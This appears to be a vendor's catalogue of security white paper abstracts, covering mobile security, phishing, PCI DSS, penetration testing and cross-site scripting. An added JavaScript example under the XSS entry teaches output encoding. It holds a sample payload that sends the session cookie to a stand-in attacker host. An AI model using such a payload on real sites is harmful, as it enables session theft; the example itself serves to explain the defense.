White Papers

You Can't Control It, But You Can Protect it: Enabling Security for Cloud, Mobile, and Social Applications

Security practices focused on on-premises systems can't protect your organization from breaches and attacks as they once did. The line between on-premises and off-premises technology isn't just blurred; it is barely relevant. Your ability to monitor users must encompass on-premises, cloud and mobile technology, or your security program has a blind spot it cannot close. This paper discusses why visibility is so essential, and outlines how you can use visibility beyond and within the firewall to develop policies and processes that protect what you can't control.

Security Guide: How to Evade Anti-Virus Detection

Penetration testing gives you a clear view of the vulnerabilities that can easily be exploited within your environment; however, organizations also need to understand and test their users' behavior without anti-virus programs stopping those tests in their tracks. A good way to explore user behavior is to run social engineering campaigns as part of a pen test. In this guide, penetration testers will learn how to evade anti-virus detection on target machines.

The Nexpose Expert System: Using an Expert System for Deeper Vulnerability Scanning

This paper explains how Rapid7 Nexpose uses an expert system to achieve better results in vulnerability scanning compared to traditional procedural methods. After a brief discussion of the product objectives and implementation, this paper explores the use of expert systems to achieve accurate and detailed vulnerability results.

The Unwitting Danger Within - Understanding and Mitigating User-Based Risk

There is a security risk in your organization that can render all of your security controls worthless with a single click. It is dynamic and changes in real time. It is the weakest link in your infrastructure, and no single security appliance or software product exists that can lock it down. What's more, you have not one but hundreds, perhaps thousands, of these risks, each sitting behind a desk in your organization. While users represent the single largest security risk to organizations, there are measures you can put in place to mitigate the risk they introduce. This eBook explores the different kinds of user-based risk in today's corporate environment, including mobile devices and cloud services, and gives actionable guidance on how to mitigate them.

Mobile Security Guide: Protect Your Organization From Mobile Malware

As mobile devices become more common, cybercriminals see them as having huge profit potential, and aim to gain access to the user's confidential personal and financial information. In this Mobile Security Guide, we'll walk you through the mobile malware landscape and what you need to know to keep your organization's data safe.

Mobile Security Guide: Policies To Mitigate Device Threats

This first-in-a-series guide gives you brief and easy recommendations on policies you can set at your organization to secure mobile devices, mitigate mobile threats, and secure company data.

Combating Phishing Attacks: How to Design an Effective Program to Protect Your Organization Against Social Engineering

Phishing has been in the news for years, and the threat has not abated. Why are attacks via phishing, and social engineering in general, so prevalent and so effective? This whitepaper examines the many different methods employed in phishing attacks and social engineering campaigns, and offers a solution-based approach to mitigating risk from these attack vectors.

Risk Visibility and Management: How IT Security Teams Can Enable Speed With Control

As fast as organizations move, IT security needs to move even faster. There are constant pressures to streamline operations and safeguard valuable assets while keeping up with a deluge of new technologies and maintaining usability for employees, partners, vendors, investors, and more. The critical capability to balance this need for speed with demand for security is visibility. Download this whitepaper to learn more.

Demystifying PCI DSS: Expert Tips and Explanations to Help You Gain PCI DSS Compliance

With its more than 200 requirements, the Payment Card Industry Data Security Standard (PCI DSS) can seem a daunting set of regulations. Nonetheless, if your organization handles credit card information in any form, it must be PCI DSS compliant. As difficult as this can seem, you can get expert help with our new eBook: Demystifying PCI DSS: Expert Tips and Explanations to Help You Gain PCI DSS Compliance.

Three Steps to Mitigate Mobile Security Risks

Read this whitepaper to learn about the mobile security landscape, key mobile security risks, and how to mitigate these risks in order to protect company data.

The Dynamic Nature of Virtualization Security: The need for real-time vulnerability management and risk assessment

The cornerstones of a proactive security strategy are vulnerability management and risk assessment. However, traditional “scan-and-patch” vulnerability scanning approaches are inadequate for dynamic, virtualized environments. Traditional scanners cannot track changes in real time, so they cannot accurately measure constantly changing risks. Anyone charged with securing IT assets needs to understand the dynamic security risks inherent to virtualized environments, and more importantly, what to do to mitigate those risks. This whitepaper explores the challenges of securing a virtualized environment and gives actionable solutions to address them.

Leveraging Security Risk Intelligence - The strategic value of measuring Real Risk™

The ongoing struggle to prevent hackers from breaching assets and malware from gaining a foothold requires a vulnerability management strategy that begins with a comprehensive measurement of security risk. Starting with an understanding of the need for effective risk management followed by a definition of the elements of risk, this whitepaper presents the advantages and strategic value of Rapid7 Security Risk Intelligence for your environment and illustrates its operation.

What is Penetration Testing? An Introduction for IT Managers

A penetration test is often a key requirement for compliance with major regulations. But while many organizations know they need penetration testing, it can be hard to know how to fit it into a larger security program, or even how to get started. Our whitepaper, "What is Penetration Testing? An Introduction for IT Managers," is a clear and succinct introduction to the core principles and best practices of penetration testing.

Vulnerability Management Evolution: From Tactical Scanner to Strategic Platform

Organizations have traditionally viewed vulnerability scanners as a tactical product, largely commoditized, and only providing value around audit time. The tide is turning, and there is a clear shift from largely compliance-driven messaging to a more security-centric view.

The CISO's Guide To Virtualization Security

This guide describes the security challenges within virtualized environments and shows how to apply the concepts of Forrester's Zero Trust Model of information security to secure the virtual environment effectively.

How to Justify Your Security Assessment Budget

Penetration testing has become a standard security tool in recent years. While it was until recently mostly confined to the military and intelligence services, penetration testing is now an integral part of regulations such as the Payment Card Industry Data Security Standard (PCI DSS), and it even features in movies and TV shows. This is not surprising, since penetration testing is not only an exciting field to work in but also delivers tangible business benefits. Penetration testing experts seem to have a bright future. One thing that many technical IT professionals struggle with, and perhaps you do as well, is selling security to non-technical management. This white paper aims to help you with that endeavor: explaining the benefits of penetration testing to the business and securing the necessary budget.

Protecting Patient Health Information in the HITECH Era

The American healthcare system is getting a complete facelift thanks to incentives to adopt health information technology introduced by the Health Information Technology for Economic and Clinical Health (HITECH) Act. The HITECH Act contains tools for the enforcement of HIPAA regulations, as well as incentives to accelerate the adoption of information systems that reduce costs, gain efficiencies, and ultimately improve patient care while keeping patient health information secure. This paper examines the HITECH Act, the enforcement mechanisms it provides for HIPAA, and the key security challenges healthcare providers face in protecting patient health information as part of becoming HIPAA compliant.

Managing Cross Site Scripting (XSS) - The Number One Item on OWASP's Top Ten List

This white paper discusses the security risk that cross-site scripting (XSS) represents for organizations. It outlines the different forms of XSS vulnerability, including reflected, stored (persistent) and DOM-based, why they are dangerous, and how to prevent them.
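As an added illustration of the reflected case and of the output-encoding defense the abstract refers to (example code written for this page, not taken from the white paper; the render functions, the escape helper, the detection regex and the sample payload are all constructed here):

```javascript
// Added example (not from the white paper): the same untrusted search
// term rendered without and with output encoding. All function names,
// the sample payload and the detection regex are constructed for this
// illustration.

// Reflected XSS: the query value is spliced into the response unchanged,
// so any markup the attacker put in the URL is parsed by the browser.
function renderSearchVulnerable(query) {
  return `<p>Results for: ${query}</p>`;
}

// Encode the five characters that can change parse context inside an
// HTML text node or a double/single-quoted attribute value. This encoder
// is correct only for those two contexts; a JavaScript string, URL or
// CSS context each needs its own encoder.
function escapeHtml(value) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Same page with the untrusted value encoded at the point it is written
// into HTML. Stored (persistent) XSS is fixed the same way: encode on
// output, regardless of whether the value came from the URL or the
// database.
function renderSearchSafe(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// Crude check for whether a rendered fragment still carries an
// executable script element or an inline event-handler attribute.
function containsActiveMarkup(html) {
  return /<script\b|<[a-z][^>]*\s+on\w+\s*=/i.test(html);
}

// Constructed sample payload: exfiltrates the session cookie if it runs.
const SAMPLE_PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

console.log('vulnerable:', renderSearchVulnerable(SAMPLE_PAYLOAD));
console.log('encoded   :', renderSearchSafe(SAMPLE_PAYLOAD));
```

Run with `node`. The encoded output is still the attacker's text, character for character, but the browser displays it as data rather than parsing it as an element. For the DOM-based variant the same principle applies on the client: write untrusted values through a non-parsing sink such as `textContent` instead of `innerHTML`.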

Best Practices to Protect the Cardholder Data Environment and Achieve PCI Compliance

Cyber-attacks designed for financial gain are on the rise, targeting proprietary information including customer and financial data. With over 127 million records exposed in the US alone in 2007, attacks are becoming increasingly sophisticated. Learn more about best practices to protect the cardholder data environment and achieve PCI compliance.

Understanding and Deploying the PCI Data Security Standard

PCI DSS is one of the most stringent and detailed sets of security requirements for retailers and merchants. This document outlines the requirements for PCI compliance: maintaining a secure network, protecting cardholder data, maintaining a vulnerability management program, implementing access controls, and regularly monitoring and testing networks.

IT Security in Higher Education White Paper

According to analysts, the higher education sector is the most breached of any industry. This white paper outlines key reasons why universities are more affected by security issues and how they can better prepare themselves to address IT security and vulnerability management challenges.